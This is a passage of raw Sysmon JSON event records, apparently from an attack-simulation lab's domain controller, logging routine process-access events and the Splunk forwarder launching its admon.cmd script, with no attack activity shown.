C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.295","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3604,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.295\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.295","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3605,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.295\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023D-5F25-0000-001075610500}\r\nTargetProcessId: 4844\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.295","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023D-5F25-0000-001075610500}","TargetProcessId":"4844","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3606,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.406\r\nProcessGuid: {A837DB8D-023D-5F25-0000-001078630500}\r\nProcessId: 2476\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\admon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.406","ProcessGuid":"{A837DB8D-023D-5F25-0000-001078630500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\admon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3607,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.404\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-023D-5F25-0000-001078630500}\r\nTargetProcessId: 2476\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.404","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"4232","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-023D-5F25-0000-001078630500}","TargetProcessId":"2476","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3608,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.404\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023D-5F25-0000-001078630500}\r\nTargetProcessId: 2476\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.404","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023D-5F25-0000-001078630500}","TargetProcessId":"2476","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3609,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.404\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.404","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3610,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.404\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.404","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3611,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.404\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.404","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 